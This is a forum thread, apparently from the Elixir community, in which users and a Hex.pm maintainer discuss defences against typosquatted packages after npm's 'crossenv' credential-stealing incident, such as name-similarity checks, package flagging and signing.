Does Hex.pm have any protection against the recent Nodejs package manager security issues (packages with similar/hyphenated names)

Source: https://news.ycombinator.com/item?id=14901566


The gist of it is someone wrote code to HTTP POST environment variables (aws keys, mailinator keys, etc) to a remote location. They published it under crossenv when the real package is cross-env.

Lots of people affected.

I’m just wondering: what does https://hex.pm have in place for something like this. It sounds like a really hard problem to solve with code. As I see it, it’s purely solved by having people manually vouch for non-abusive libraries.

Nothing currently, I’m not sure what could be done that would work well.

Could do something like put first-time uploaders into a confirmation queue, but manually going over their code would suck and it would not help when it is someone’s second package.

Could do signed packages where you put some kind of signature into the :dep to confirm it is from the author and not someone else, but people will just end up copy/pasting those anyway.

Could require a minimum number of people to ‘vouch’ for a dependency before it can be auto-grabbed by mix, but that harms newbies and/or library authors that don’t interact with the overall community, which really really harms the ability for people to contribute.

At the very least I think hex.pm needs a commenting system and flagging system for each package so people can at least talk about issues they see in it and if necessary to fully flag it so admins can look at the conversation to see what is going on so they can remove it if necessary. Will not pre-catch such things, but catching them ‘eventually’ is better then never at least.

Even once a nasty package like that is removed then the next time mix fetches and confirms deps then it needs to display a very loud and red message saying to remove this removed dep.

1 Like

There’s been a bachelors thesis based on this: incolumitas.com – Typosquatting programming language package managers (link to the author’s blog; the thesis can be found there).

She suggests:

Prevent Direct Code Execution on Installations This one is easy. Make sure that the software that unpacks and installs a third party package (pip or npm) does not allow the execution of code that originates from the package itself. Only when the user explicitly loads the package, the library code should be executed.

Generate a List of Potential Typo Candidates Generate Levenshtein distance candidates for the most downloaded N packages of the repository and alarm administrators on registration of such a candidate.

Analyze 404 logfiles and prevent registration of often shadow installed packages Whenever a user makes a typo by installing a package and the package is not registered yet, a 404 logfile entry on the repository server is created (because the install HTTP requests targets a non-existent resource). Parse these failed installations and prevent all such names that are shadow-installed more than a reasonable threshold per month.

To which I can add:

  • Suspect packages whose source code contains a literal URL or DNS (it might be a way to communicate the information back)

I agree that while suspicious packages should be reviewed, all packages should be allowed by default.

2 Likes

That is not a bad idea, have the hex.pm server listen for 404 package requests (I don’t know if it can with it’s setup of file serving) and add those to a list for an admin to look at to see if they should be ‘locked’ or something, hmm…

That looks like an interesting thesis. It would be cool if someone implemented some of her suggestions in hex.pm. Which is possible because hex.pm is open source:

1 Like

Arch Linux approached this problem by creating a two-tier system. Packages start in the use-at-your-own-risk Arch User Repository (AUR). I would call AUR-packages intentionally awkward as there is an outlined protocol forcing you to build the package yourself (PKGBUILD) locally before being able to install it with the package manager - maximizing the opportunity for you to review the code before actually being able to use it’s content.

Only the highest rated/voted packages then later become part of the community repository that can be more mindlessly and directly managed via pacman.

In a way the hassle of dealing with AUR packages encourages satisfied package users to vote to have the package migrated in order to make keeping it updated more convenient.

Meanwhile the actual community repository already contains enough packages to keep most new users busy for a while before they need to use something from the AUR.

1 Like

I do not think, that such packages are pulled in easily. While with npm it is a common pattern do download a dep and edit the package-description from the CLI using npm-tooling. I do think this is were the typos come in. With hex though, we have to look up hex.pm for the latest version to get the dependency tuple correct (no one uses >= 0.0.0 just to get started quickly, I hope).

When one typos at hex-search one will realize that the version information is somewhat off (only one version of creto available? I started using it with 0.3, now theres only 0.7? Haven’t I read some release notes about 0.8? Oh, it has to be spelled credo!)

I’m not telling we do not need countermeasures though, I’d be glad if there were signed packages available. This were a major selling point for elixir at my dayjob…

Also I like the idea of community flagged packages. If there are too many flags on a package it will be hidden until it got reviewed by the staff/trusted community members. I’m not proposing up and downvoting here!

I’m not sure about the ideo of dividing hex into first- and second-class packages. This makes it hard to discover new packages or to get clearance to use them in business projects. (At least I have to assume, since I’m currently working closely in touch with devops and I always have trouble when I need something not in centOS core repositories, even EPEL is hard to get something from)


edit

According to a discussion I read on twitter, they also tried to “hijack” the mongoose package. But I do not remember how they typo’d it, neither am I able to find the twitter discussion I read on the bus this morning.

The last time this vulnerability [1] was reported we added some protections against it. We discussed possible solutions with the author of the thesis and decided that for Hex the best solution was to add a levenshtein check that runs once a day that compares new package names against existing ones. If a package name looks like a possible typo attack we will investigate it.

[1] incolumitas.com – Typosquatting programming language package managers

9 Likes

The real package is cross-env, not the malicious package.

Could Hex make a point to flag code that contacts other servers or IP addresses? Seems like if something like that unexpectedly appeared it would be more noticeable.

How do you want to detect that? Sometimes we even want to connect do other servers to fetch data or push it. Thats the whole selling point of distributed applications, the ability to communicate to each other…

In 3rd party packages. If you detect it in code from a library where it’s not expected it could make something like that more obvious.

How should a program know if a certain thing is expected or not? Perhaps it is part of the build that I submit some data to a HTTP server, generate a file, download it and generate some Functions from it? Similar how the RegEx module is built but with a server generated file. Of course, I’d not write something like that for a public library, because it would depend on infrastructure which I need to maintain than, but for some internal tooling I already built similar stuff.

A program shouldn’t, a developer should.

If I add a new package to my application and in the code base hex highlights 5 references to specific domains or ip addresses being connected too, I would know whether or not that would be expected behavior. Unless I’m actually pulling in a package that is explicitly supposed to be connecting me to a 3rd party API, that would be unexpected behavior and a pretty big red flag.

If I’m pulling in something like Boltun to take advantage of LISTEN/NOTIFY on my Postgres database but somebody decides to squat on Bolton this could happen. If I pull in the package with that typo see that there’s a call out to a specific IP address inside…that’s going to set off alarm bells. This is just supposed to work between Elixir and my database - there shouldn’t be any other connections.

It would be an extra layer of automated and visible community review for when things like this happen. It wouldn’t stop this stuff from happening, but it would help to make more people aware more quickly if it did.

This is impossible to detect automatically. You would need a full a security audit to do this reliably.

1 Like

My bad totally unintentional – I’ll update my first post.